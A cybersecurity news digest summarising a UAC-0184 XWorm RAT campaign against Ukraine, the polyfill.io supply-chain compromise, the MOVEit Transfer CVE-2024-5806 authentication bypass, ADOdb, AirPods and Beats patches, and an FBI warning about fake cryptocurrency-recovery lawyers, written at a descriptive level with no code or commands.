A recent exposé by researchers on the Russia-affiliated UAC-0184 group revealed a labyrinthine campaign against Ukraine. The adversaries employ DLL sideloading and wield a sinister tool dubbed Shadowloader, seamlessly weaving the XWorm RAT into unsuspecting processes. This RAT flaunts a wide array of capabilities: from siphoning data to orchestrating DDoS attacks.

Parallelly, a new critical bug in MOVEit Transfer sent ripples through the cybersecurity community. This flaw opens a gateway for attackers to bypass security measures and infiltrate systems.

Meanwhile, the FBI alerted about a new cryptocurrency scam. These fraudsters don the guise of reputable lawyers and law firms, peddling fictitious cryptocurrency recovery services for scam victims.

Top Malware Reported in the Last 24 Hours

XWorm RAT targets Ukraine

Cyble identified the Russia-linked threat actor group UAC-0184 targeting Ukraine with the XWorm RAT. The campaign begins with a malicious LNK shortcut file disguised as an Excel document, which executes a PowerShell script to download and execute malicious files. The attackers use DLL sideloading and a tool called Shadowloader to inject the XWorm RAT into a running process. The XWorm RAT has various capabilities, including data theft, DDoS attacks, and cryptocurrency manipulation. The campaign's initial infection vector is unclear, but phishing emails may be involved.

Are you using****Polyfill.io?

The polyfill[.]io domain, previously used for JavaScript polyfills, has been compromised and is now serving malicious code to over 100,000 websites. The domain was bought by a Chinese organization, leading to a supply chain attack that infected visitors' browsers with malware. The malicious code is dynamically generated based on the website's HTTP headers, making it difficult to detect and block. Google has started blocking Google Ads for affected websites to reduce traffic and potential victims.

Top Vulnerabilities Reported in the Last 24 Hours

New critical bug in MOVEit Transfer

A critical security vulnerability, CVE-2024-5806, has been identified in MOVEit Transfer, which can allow attackers to bypass authentication and gain unauthorized access to the system. The vulnerability is caused by improper validation of user-supplied input during the authentication process. The affected versions include MOVEit Transfer 2023.0.0 to 2023.0.10, 2023.1.0 to 2023.1.5, and 2024.0.0 to 2024.0.1. Progress strongly urges all MOVEit Transfer customers to immediately upgrade to the latest patched versions: 2023.0.11, 2023.1.6, and 2024.0.2.

ADOdb flaw fixed in Ubuntu

The ADOdb PHP library has been found to have multiple critical vulnerabilities, including SQL injection, XSS attacks, and authentication bypasses. The Ubuntu security team has released updates to fix these vulnerabilities in Ubuntu 22.04 LTS, 20.04 LTS, 18.04 ESM, and 16.04 ESM. The vulnerabilities are tracked as CVE-2016-7405, CVE-2016-4855, and CVE-2021-3850.

Firmware update for AirPods

Apple has patched a vulnerability (CVE-2024-27867) that could allow an attacker to gain unauthorized access to AirPods and other Beats headphones. The vulnerability affects AirPods (2nd generation and later), AirPods Pro, AirPods Max, Powerbeats Pro, and Beats Fit Pro. The issue was caused by a flaw in the authentication process when the headphones were seeking a connection to a previously paired device.

Top Scams Reported in the Last 24 Hours

Beware of fake crypto scam

The FBI issued a warning about a new wave of cybercriminals posing as lawyers and law firms, offering fake cryptocurrency recovery services to defraud victims of cryptocurrency scams. These scammers use tactics such as verification requests, upfront fees, and referencing legitimate institutions to appear credible. Victims have reported over $9.9 million in losses between February 2023 and February 2024.